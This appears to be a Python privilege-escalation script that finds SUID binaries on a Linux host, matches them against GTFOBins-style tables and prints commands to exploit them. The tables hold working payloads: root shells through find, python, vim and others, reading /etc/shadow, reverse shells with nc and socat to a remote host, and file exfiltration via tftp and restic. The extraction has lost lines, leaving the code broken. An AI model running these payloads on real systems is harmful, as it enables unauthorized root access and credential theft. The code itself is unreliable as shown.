DirtyScripts / privesc /

Works with both python2 & python3

from sys import argv
from os import system, popen
from time import sleep

The following list contains exploits for all known SUID binaries

customSUIDs = {
	'aria2c': 'COMMAND=\'id\'\nTF=$(mktemp)\necho "$COMMAND" > $TF\nchmod +x $TF\n./aria2c --on-download-error=$TF http://x',
	'arp': 'LFILE=file_to_read\n./arp -v -f "$LFILE"',
	'base32': 'LFILE=file_to_read\nbase32 "$LFILE" | base32 --decode',
	'base64': 'LFILE=file_to_read\n./base64 "$LFILE" | base64 --decode',
	'byebug': 'TF=$(mktemp)\necho \'system("/bin/sh")\' > $TF\n./byebug $TF\ncontinue',
	'chmod': 'LFILE=file_to_change\n./chmod 0777 $LFILE',
	'chown': 'LFILE=file_to_change\n./chown $(id -un):$(id -gn) $LFILE',
	'cp': 'LFILE=file_to_write\nTF=$(mktemp)\necho "DATA" > $TF\n./cp $TF $LFILE',
	'curl': 'URL=\nLFILE=file_to_save\n./curl $URL -o $LFILE',
	'date': 'LFILE=file_to_read\n./date -f $LFILE',
	'dd': 'LFILE=file_to_write\necho "data" | ./dd of=$LFILE',
	'dialog': 'LFILE=file_to_read\n./dialog --textbox "$LFILE" 0 0',
	'diff': 'LFILE=file_to_read\n./diff --line-format=%L /dev/null $LFILE',
	'dmsetup': "./dmsetup create base <<EOF\n0 3534848 linear /dev/loop0 94208\nEOF\n./dmsetup ls --exec '/bin/sh -p -s'", 'file': 'LFILE=file_to_read\n./file -m $LFILE',
	'ed': './ed\n!/bin/sh',
	'eqn': 'LFILE=file_to_read\n./eqn "$LFILE"',
	'fmt': 'LFILE=file_to_read\n./fmt -pNON_EXISTING_PREFIX "$LFILE"',
	'git': 'PAGER=\'sh -c "exec sh 0<&1"\' ./git -p help',
	'gtester': 'TF=$(mktemp)\necho \'#!/bin/sh -p\' > $TF\necho \'exec /bin/sh -p 0<&1\' >> $TF\nchmod +x $TF\ngtester -q $TF',
	'hd': 'LFILE=file_to_read\n./hd "$LFILE"',
	'hexdump': 'LFILE=file_to_read\n./hexdump -C "$LFILE"',
	'highlight': 'LFILE=file_to_read\n./highlight --no-doc --failsafe "$LFILE"',
	'iconv': 'LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 "$LFILE"',
	'iftop': './iftop\n!/bin/sh',
	'ip': 'LFILE=file_to_read\n./ip -force -batch "$LFILE"',
	'jjs': 'echo "Java.type(\'java.lang.Runtime\').getRuntime().exec(\'/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)\').waitFor()" | ./jjs',
	'jq': 'LFILE=file_to_read\n./jq -Rr . "$LFILE"',
	'ksshell': 'LFILE=file_to_read\n./ksshell -i $LFILE',
	'ldconfig': 'TF=$(mktemp -d)\necho "$TF" > "$TF/conf"\n# move malicious libraries in $TF\n./ldconfig -f "$TF/conf"',
	'look': 'LFILE=file_to_read\n./look \'\' "$LFILE"',
	'lwp-download': 'URL=\nLFILE=file_to_save\n./lwp-download $URL $LFILE',
	'lwp-request': 'LFILE=file_to_read\n./lwp-request "file://$LFILE"',
	'mv': 'LFILE=file_to_write\nTF=$(mktemp)\necho "DATA" > $TF\n./mv $TF $LFILE',
	'mysql': "./mysql -e '\\! /bin/sh'", 'awk': './awk \'BEGIN {system("/bin/sh")}\'',
	'nano': './nano\n^R^X\nreset; sh 1>&0 2>&0',
	'nawk': './nawk \'BEGIN {system("/bin/sh")}\'',
	'nc': '\nRPORT=12345\n./nc -e /bin/sh $RHOST $RPORT',
	'nmap': 'TF=$(mktemp)\necho \'os.execute("/bin/sh")\' > $TF\n./nmap --script=$TF',
	'nohup': 'nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"',
	'openssl': 'openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port 12345\n',
	'pic': './pic -U\n.PS\nsh X sh X',
	'pico': './pico\n^R^X\nreset; sh 1>&0 2>&0',
	'pry': './pry\nsystem("/bin/sh")',
	'readelf': 'LFILE=file_to_read\n./readelf -a @$LFILE',
	'restic': '\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\n./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"',
	'scp': 'TF=$(mktemp)\necho \'sh 0<&2 1>&2\' > $TF\nchmod +x "$TF"\n./scp -S $TF a b:',
	'shuf': 'LFILE=file_to_write\n./shuf -e DATA -o "$LFILE"\nsudo:',
	'soelim': 'LFILE=file_to_read\n./soelim "$LFILE"',
	'sqlite3': "./sqlite3 /dev/null '.shell /bin/sh'", 'socat': '\nRPORT=12345\n./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane',
	'strings': 'LFILE=file_to_read\n./strings "$LFILE"',
	'sysctl': 'LFILE=file_to_read\n./sysctl -n "/../../$LFILE"',
	'systemctl': 'TF=$(mktemp).service\necho \'[Service]\nType=oneshot\nExecStart=/bin/sh -c "id > /tmp/output"\n[Install]\\' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF',
	'tac': 'LFILE=file_to_read\n./tac -s \'PromiseWontOverWrite\' "$LFILE"',
	'tar': './tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh',
	'tee': 'LFILE=file_to_write\necho DATA | ./tee -a "$LFILE"',
	'telnet': '\nRPORT=12345\n./telnet $RHOST $RPORT\n^]\n!/bin/sh',
	'tftp': '\n./tftp $RHOST\nput file_to_send',
	'uudecode': 'LFILE=file_to_read\nuuencode "$LFILE" /dev/stdout | uudecode',
	'uuencode': 'LFILE=file_to_read\nuuencode "$LFILE" /dev/stdout | uudecode',
	'xz': 'LFILE=file_to_read\n./xz -c "$LFILE" | xz -d',
	'zip': "TF=$(mktemp -u)\n./zip $TF /etc/hosts -T -TT 'sh #'\nsudo rm $TF", 'wget': 'export URL=\nexport LFILE=file_to_save\n./wget $URL -O $LFILE',
	'zsoelim': 'LFILE=file_to_read\n./zsoelim "$LFILE"',

The following list contains all default SUID bins found within Unix

defSUIDBinaries = ["arping", "at", "bwrap", "chfn", "chrome-sandbox", "chsh", "dbus-daemon-launch-helper", "dmcrypt-get-device", "exim4", "fusermount", "gpasswd", "helper", "kismet_capture", "lxc-user-nic", "mount", "mount.cifs", "mount.ecryptfs_private", "mount.nfs", "newgidmap", "newgrp", "newuidmap", "ntfs-3g", "passwd", "ping", "ping6", "pkexec", "polkit-agent-helper-1", "pppd", "snap-confine", "ssh-keysign", "su", "sudo", "traceroute6.iputils", "ubuntu-core-launcher", "umount", "VBoxHeadless", "VBoxNetAdpCtl", "VBoxNetDHCP", "VBoxNetNAT", "VBoxSDL", "VBoxVolInfo", "VirtualBoxVM", "vmware-authd", "vmware-user-suid-wrapper", "vmware-vmx", "vmware-vmx-debug", "vmware-vmx-stats", "Xorg.wrap"]

Auto Exploitation of SUID Bins - List

suidExploitation = {
	'ash': '',
	'bash': '-p',
	'busybox': 'sh',
	'cat': '/etc/shadow',
	'chroot': '/ /bin/sh -p',
	'csh': '-b',
	'cut': '-d "" -f1 /etc/shadow',
	'dash': '-p',
	'docker': 'run -v /:/mnt --rm -it alpine chroot /mnt sh',
	'emacs': '-Q -nw --eval \'(term "/bin/sh -p")\'',
	'env': '/bin/sh -p',
	'expand': '/etc/shadow',
	'expect': '-c "spawn /bin/sh -p;interact"',
	'find': '. -exec /bin/sh -p \\; -quit',
	'flock': '-u / /bin/sh -p',
	'fold': '-w99999999 /etc/shadow',
	'gawk': '\'BEGIN {system("/bin/sh")}\'',
	'gdb': '-q -nx -ex \'python import os; os.execl("/bin/sh", "sh", "-p")\' -ex quit',
	'gimp': '-idf --batch-interpreter=python-fu-eval -b \'import os; os.execl("/bin/sh", "sh", "-p")\'',
	'grep': '"" /etc/shadow',
	'head': '-c2G /etc/shadow',
	'ionice': '/bin/sh -p',
	'jrunscript': '-e "exec(\'/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)\')"',
	'ksh': '-p',
	'': '/bin/sh -p',
	'less': '/etc/shadow',
	'logsave': '/dev/null /bin/sh -i -p',
	'lua': '-e \'os.execute("/bin/sh")\'',
	'make': '-s --eval=$\'x:\\n\\t-\'"/bin/sh -p"',
	'mawk': '\'BEGIN {system("/bin/sh")}\'',
	'more': '/etc/shadow',
	'nice': '/bin/sh -p',
	'nl': '-bn -w1 -s \'\' /etc/shadow',
	'node': 'node -e \'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});\'',
	'od': 'od -An -c -w9999 /etc/shadow | sed -E -e \'s/ //g\' -e \'s/\\\\n/\\n/g\'',
	'perl': '-e \'exec "/bin/sh";\'',
	'pg': '/etc/shadow',
	'php': '-r "pcntl_exec(\'/bin/sh\', [\'-p\']);"',
	'python': '-c \'import os; os.execl("/bin/sh", "sh", "-p")\'',
	'rlwrap': '-H /dev/null /bin/sh -p',
	'rpm': '--eval \'%{lua:os.execute("/bin/sh", "-p")}\'',
	'rpmquery': '--eval \'%{lua:posix.exec("/bin/sh", "-p")}\'',
	'rsync': '-e \'sh -p -c "sh 0<&2 1>&2"\'',
	'run-parts': '--new-session --regex \'^sh$\' /bin --arg=\'-p\'',
	'rvim': '-c \':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")\'',
	'sed': '-e "" /etc/shadow',
	'setarch': '$(arch) /bin/sh -p',
	'sort': '-m /etc/shadow',
	'start-stop-daemon': '-n $RANDOM -S -x /bin/sh -- -p',
	'stdbuf': '-i0 /bin/sh -p',
	'strace': '-o /dev/null /bin/sh -p',
	'tail': '-c2G /etc/shadow',
	'taskset': '1 /bin/sh -p',
	'time': '/bin/sh -p',
	'timeout': '7d /bin/sh -p',
	'ul': '/etc/shadow',
	'unexpand': 'unexpand -t99999999 /etc/shadow',
	'uniq': '/etc/shadow',
	'unshare': '-r /bin/sh',
	'vim': '-c \':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")\'',
	'watch': '-x sh -c \'reset; exec sh 1>&0 2>&0\'',
	'xargs': '-a /dev/null sh -p',
	'xxd': '/etc/shadow | xxd -r',
	'zsh': '',

The following list contains GTFO Bins binaries which are SUID exploitable

gtfoBinsList	= ['bash', 'busybox', 'cat', 'chroot', 'cut', 'dash', 'docker', 'env', 'expand', 'expect', 'find', 'flock', 'fold', 'gdb', 'grep', 'head', 'ionice', 'jrunscript', 'ksh', '', 'less', 'logsave', 'make', 'more', 'nice', 'nl', 'node', 'od', 'perl', 'pg', 'php', 'python', 'rlwrap', 'rpm', 'rpmquery', 'rsync', 'run-parts', 'rvim', 'sed', 'setarch', 'sort', 'start-stop-daemon', 'stdbuf', 'strace', 'tail', 'taskset', 'time', 'timeout', 'ul', 'unexpand', 'uniq', 'unshare', 'vim', 'watch', 'xargs', 'xxd', 'zsh', 'aria2c', 'arp', 'ash', 'base32', 'base64', 'byebug', 'chmod', 'chown', 'cp', 'csh', 'curl', 'date', 'dd', 'dialog', 'diff', 'dmsetup', 'file', 'ed', 'emacs', 'eqn', 'fmt', 'gawk', 'gimp', 'git', 'gtester', 'hd', 'hexdump', 'highlight', 'iconv', 'iftop', 'ip', 'jjs', 'jq', 'ksshell', 'ldconfig', 'look', 'lua', 'lwp-download', 'lwp-request', 'mawk', 'mv', 'mysql', 'awk', 'nano', 'nawk', 'nc', 'nmap', 'nohup', 'openssl', 'pic', 'pico', 'pry', 'readelf', 'restic', 'scp', 'shuf', 'soelim', 'sqlite3', 'socat', 'strings', 'sysctl', 'systemctl', 'tac', 'tar', 'tclsh', 'tee', 'telnet', 'tftp', 'uudecode', 'uuencode', 'xz', 'zip', 'wget', 'zsoelim']

Colors List

cyan 	= "\033[0;96m"
green 	= "\033[0;92m"
white 	= "\033[0;97m"
red 	= "\033[0;91m"
blue 	= "\033[0;94m"
yellow 	= "\033[0;33m"
magenta = "\033[0;35m"

barLine = "------------------------------"

banner 	= magenta + "  ___ _   _ _ ___    _____  _ _   _ __  __ \n"
banner += yellow + " / __| | | / |   \\  |__ / \\| | | | |  \\/  |\n"
banner += blue + " \\__ \\ |_| | | |) |  |_ \\ .` | |_| | |\\/| |\n"
banner += red + " |___/\\___/|_|___/  |___/_|\\_|\\___/|_|  |_| " + cyan + " twitter@syed__umar\n"

def listAllSUIDBinaries():
	Listing all SUID Binaries found in the system

	print(white + "[" + blue + "#" + white + "] " + yellow + "Finding/Listing all SUID Binaries ..")
	print(white + barLine)
	command 	= "find / -perm -4000 -type f 2>/dev/null" # Since /4000 isn't backwards compatible with old versions of find ..  :)) 
	result 		= popen(command).read().strip().split("\n")
	for bins in result:
		print(yellow + bins)
	print(white + barLine + "\n\n")

def doSomethingPlis(listOfSuidBins):
	This function prints the following data:
		- Default binaries which ship with installation of linux
		- Custom binaries which aren't part of default list
		- Binaries which match GTFObins list!

	_bins 			= []
	binsInGTFO 		= []
	customSuidBins 	= []
	defaultSuidBins = []

	for bins in listOfSuidBins:
		_binName 	= bins.split("/")[::-1][0]

		if _binName not in defSUIDBinaries:

			if _binName in gtfoBinsList:


	print(white + "["+ red + "!" + white + "] Default Binaries (Don't bother)")
	for bins in defaultSuidBins: print(blue + bins)
	print(white + barLine + "\n\n")

	print(white + "[" + cyan + "~" + white + "] " + cyan + "Custom SUID Binaries (Interesting Stuff)")
	print(white + barLine)
	for bins in customSuidBins: print(cyan + bins)
	print(white + barLine + "\n\n")


	if len(binsInGTFO) != 0:
		print("[" + green + "#" + white + "] " + green + "SUID Binaries in GTFO bins list (Hell Yeah!)")
		print(white + barLine)

		for bin in binsInGTFO:
			pathOfBin 	= popen("which " + bin).read().strip()
			gtfoUrl 	= "" + bin[::-1].split("/")[0][::-1] + "/#suid"
			print(green + pathOfBin + white + " -~> " + magenta + gtfoUrl)
		print(white + barLine + "\n\n")

		print("[" + green + "#" + white + "] " + green + "SUID Binaries found in GTFO bins..")
		print(white + barLine)
		print("[" + red + "!" + white + "] " + magenta + "None " + red + ":(")
		print(white + barLine + "\n\n")

	PR by @th3instein
	binsToExploit 	= []
	_binsToExploit 	= {}
	for binary in binsInGTFO:
		binaryName 	= binary[::-1].split("/")[0][::-1]

		if binaryName not in suidExploitation:
			_binsToExploit[binary] = customSUIDs[binaryName]

	if len(_binsToExploit) != 0:
		print("[" + yellow + "&" + white + "] " + cyan + "Manual Exploitation (Binaries which create files on the system)")
		print(white + barLine)

		for binaryPath, binaryExploitation in _binsToExploit.items():
			binaryName 			= binaryPath[::-1].split("/")[0][::-1]
			binaryExploitation 	= binaryExploitation.replace(binaryName, binaryPath).replace("./", "")

			# print(binaryName, binaryExploitation)

			print(white + "[" + cyan + "&" + white + "] " + magenta + binaryName.capitalize() + white + " ( " + green + binaryPath + " )" + white)
			print(yellow + binaryExploitation + white + "\n")

		print(white + barLine + "\n\n")
	@PR End
	return(binsInGTFO, defaultSuidBins, customSuidBins)

def note():
	print(white + "[" + red + "-" + white + "] " + magenta + "Note")
	print(white + barLine)
	print(blue  + "If you see any FP in the output, please report it to make the script better! :)")	
	print(white + barLine + "\n")

def exploitThisShit(bins):
	commands 	= []

	for suidBins in bins:
		_bin 	= suidBins.split("/")[::-1][0]
		if _bin in suidExploitation:
			_results 	= suidBins + " " + suidExploitation[_bin]

	if len(commands) != 0:
		if len(argv) == 2:
			if argv[1] == '-e':
				print(white + "[" + magenta + "$" + white + "] " + white + "Auto Exploiting SUID bit binaries !!!")
				print(white + barLine)

				for _commands in commands:
					print(magenta + "\n[#] Executing Command .. ")
					print(cyan + "[~] " + _commands + "\n" + white)

			print(white + "[" + green + "$" + white + "] " + white + "Please try the command(s) below to exploit harmless SUID bin(s) found !!!")
			print(white + barLine)

			for _commands in commands:
				print("[~] " + _commands)

		print(white + barLine + "\n\n")	

def main():
		suidBins 	= listAllSUIDBinaries()
		gtfoBins 	= doSomethingPlis(suidBins)
		exploitThisShit(gtfoBins[0]); note()

	except KeyboardInterrupt:
		print("\n[" + red + "!" + white + "] " + red + "Aye, why you do dis!?")

if __name__ == '__main__':